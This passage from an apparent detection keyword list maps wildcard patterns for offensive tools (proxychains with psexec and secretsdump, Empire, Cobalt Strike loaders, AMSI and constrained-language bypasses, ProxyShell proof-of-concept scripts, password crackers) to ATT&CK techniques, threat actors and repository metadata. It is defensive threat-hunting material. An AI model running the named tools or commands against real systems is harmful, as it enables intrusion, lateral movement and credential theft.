-A*","offensive_tool_keyword","ligolo","proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*proxychains nmap*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains psexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains rdesktop *","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*proxychains secretsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains smbclient -L *","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow 
through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains smbexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains telnet*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains wmiexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains*scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*proxychains.conf*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains.lsm*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains.sourceforge.net*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - 
TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains-master*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains-other.conf*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*Proxy-DLL-Loads*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*proxyDllLoads.c*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*proxyDllLoads.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*proxyLogon.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*proxyshell.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*proxyshell_rce.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A",,"N/A",,, +"*proxyshellcodeurl*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*proxyshell-enumerate.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A",,"N/A",,, +"*proxyshell-poc*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A",,"N/A",,, +"*ps_token2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ps_wmi_exec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ps2exe -*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe *.ps1*.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.ps1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.psd1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.psm1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*PS2EXE-master*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*PSAmsiScanner.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*PSAttack*","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. 
It does this with in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PSBits*NetShRun*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*PSByPassCLM*","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","3","280","45","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z" +"*psc4re/NSE-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*PSconfusion.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*pse2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ps-empire client*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*ps-empire server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - 
T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*psexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*PsExec[1].exe*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. 
or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*psexec_ms17_010.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PSEXEC_PSH *","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*PsExec64*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*-PsExecCmd*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PsExecLiveImplant*","offensive_tool_keyword","koadic","Koadic. or COM 